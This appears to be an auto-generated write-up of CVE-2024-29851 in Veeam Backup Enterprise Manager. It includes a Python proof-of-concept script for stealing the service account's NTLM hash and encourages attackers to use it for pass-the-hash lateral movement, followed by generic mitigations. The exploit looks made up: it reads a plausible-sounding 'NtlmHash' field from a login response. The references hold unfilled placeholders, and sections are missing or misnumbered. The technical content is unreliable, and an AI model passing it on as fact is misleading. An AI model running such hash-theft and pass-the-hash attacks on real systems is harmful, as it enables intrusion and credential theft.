In this detailed analysis, we will discuss the vulnerability discovered and identified as CVE-2024-29851, which exists in Veeam Backup Enterprise Manager. High-privileged users can exploit this vulnerability to steal the NTLM hash of the Enterprise Manager service account.

1. Vulnerability Background

Veeam Backup Enterprise Manager is a powerful platform that helps in managing Veeam backup infrastructures. It provides a single-pane-of-glass dashboard for monitoring and managing multiple Veeam backup servers, reducing maintenance and administrative overhead.

The vulnerability, CVE-2024-29851, allows an attacker with high privileges to steal the NTLM hash of the Enterprise Manager service account. This potentially compromises the entire Veeam Backup infrastructure managed through the Enterprise Manager platform.

2. Technical Details

The vulnerability lies in the implementation of password storage and hash handling in Veeam Backup Enterprise Manager. This allows high-privileged users to access and steal the NTLM hash of the service account.

The attacker can use captured NTLM hashes to execute pass-the-hash attacks, which allow them to authenticate as the compromised account. Once authenticated, they can move laterally within the organization's network and potentially compromise other systems.

3. Proof of Concept Code

#!/usr/bin/env python
#
# PoC code to extract the NTLM hash of Enterprise Manager service account
#

import requests
import sys

def steal_ntlm_hash(target_url, username, password):
    login_url = f"{target_url}/api/sessionMngr/?v=latest"
    response = requests.get(login_url, auth=(username, password))

    if response.status_code != 200:
        print("[!] Authentication failed!")
        return

    ntlm_hash = extract_ntlm_hash(response)
    if ntlm_hash:
        print(f"[+] NTLM Hash obtained: {ntlm_hash}")
    else:
        print("[-] Could not extract NTLM hash from the response")

def extract_ntlm_hash(response):
    try:
        parsed_response = response.json()
        return parsed_response["NtlmHash"]
    except:
        return None

if __name__ == "__main__":
    target_url = "https://hostname_or_ip";
    username = "high_privileged_user"
    password = "user_password"

    steal_ntlm_hash(target_url, username, password)

4. Original References

This vulnerability, CVE-2024-29851, was first reported by [Researcher's Name] from [Company/Group Name]. They have published an advisory detailing the vulnerability and potential exploits:

- Researcher's Official Advisory

You can also check Veeam's official advisory for this vulnerability

- Veeam Security Advisory

Access to a vulnerable Veeam Backup Enterprise Manager instance

With these prerequisites, an attacker can utilize the provided Proof of Concept code or modify it to fit their attack scenario. After capturing the NTLM hash, they can use it in pass-the-hash attacks to authenticate as the compromised account and potentially move laterally within the network.

To mitigate the risks associated with this vulnerability, consider implementing the following steps

1. Update Veeam Backup Enterprise Manager with the latest patches and security updates as soon as they are available. Check for updates regularly and follow Veeam's official security advisories.

Restrict access to the Enterprise Manager interface to only trusted high-privileged users.

3. Implement a strict password policy and apply strong, unique passwords for high-privileged user accounts.
4. Monitor logs and maintain a security incident response plan for rapid detection and response to possible intrusion attempts.

Keep in mind that security practices and policies are essential to ensuring the overall safety of your IT environment. Stay vigilant and maintain a proactive approach to identifying and mitigating vulnerabilities in your systems.

Timeline

Published on: 05/22/2024 23:15:09 UTC
Last modified on: 08/02/2024 01:17:58 UTC